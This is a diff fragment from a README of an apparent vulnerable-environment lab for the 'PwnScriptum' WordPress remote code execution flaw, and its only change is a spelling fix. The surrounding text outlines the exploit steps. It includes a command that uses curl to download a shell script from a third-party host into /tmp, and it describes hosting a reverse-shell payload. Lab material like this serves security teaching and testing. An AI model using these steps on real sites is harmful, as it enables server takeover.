CatGunsmither/vulhub/approved/working-pwnscriptum-wordpress/README.md

 However, there are still a lot of characters can't be used.
 So we need to put the command on the third-party website, and then download it to `/tmp` directory by `curl -o /tmp/rce example.com/shell.sh`.

-Therefore, the expliot process is follows:
+Therefore, the exploit process is follows:

 - Write the exp of reverse shell and put it on a site.
 The exp have this following requirements:
   - the entire url's uppercase letters will be converted to lowercase, so the file path should not contain uppercase letters.